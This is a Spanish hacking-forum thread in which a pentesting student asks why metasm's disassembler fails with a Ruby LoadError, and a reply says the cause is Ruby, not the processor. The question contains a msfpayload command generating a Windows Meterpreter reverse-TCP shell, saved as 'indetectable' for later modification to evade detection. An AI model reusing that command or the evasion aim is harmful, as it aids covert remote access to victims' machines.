Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: elbrujo20 en 23 Diciembre 2015, 07:18 am



Título: duda con disamble en kali linux
Publicado por: elbrujo20 en 23 Diciembre 2015, 07:18 am
Buenas ando intentando ensamblar un archivo en kali linux con dissamble pero consigo un error no se a que se deba estuve investigando que alomejor por mi arquitectura de procesador que es un amd la mayoria funciona con intel pero no conozco una herramienta que me funcione con amd  este es el error
primero creo el archivo
msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.15 lport=1000 R> indetectable

locate disassemble
/usr/share/metasploit-framework/lib/metasm/metasm/disassemble.rb
/usr/share/metasploit-framework/lib/metasm/metasm/disassemble_api.rb
/usr/share/metasploit-framework/lib/metasm/samples/disassemble-gui.rb
/usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb
elijo la ultima opcion y aqui esta el problema:
ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb indetectable > indetectable.asm

/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- metasm (LoadError)
   from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
   from /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb:13:in `<main>'
no me crea ningun archivo binario ya intente con nasm pero solo logro haer el archivo .o pero no contiene nada en ensamblador para hacerle las modificiaciones si alguien sabe ak se deba se lo agradeceria no se mucho de asm estoy sigiendo un curso de pentestin

Saludos


Título: Re: duda con disamble en kali linux
Publicado por: MeCraniDOS en 31 Diciembre 2015, 18:21 pm
estuve investigando que alomejor por mi arquitectura de procesador que es un amd la mayoria funciona con intel pero no conozco una herramienta que me funcione con amd

Como investigas?  :rolleyes: :huh:

El problema es que no leemos los mensajes de error


/usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require': cannot load such file -- metasm (LoadError)
   from /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36:in `require'
   from /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb:13:in `<main>'

Si buscas la primera linea en Google te salen resultados de usuarios que han tenido el mismo problema que tú, el problema está con ruby, no con tu procesador  :rolleyes:, te pongo un link que te puede ayudar.

https://forums.kali.org/archive/index.php/t-3923.html (https://forums.kali.org/archive/index.php/t-3923.html)


Un saludo.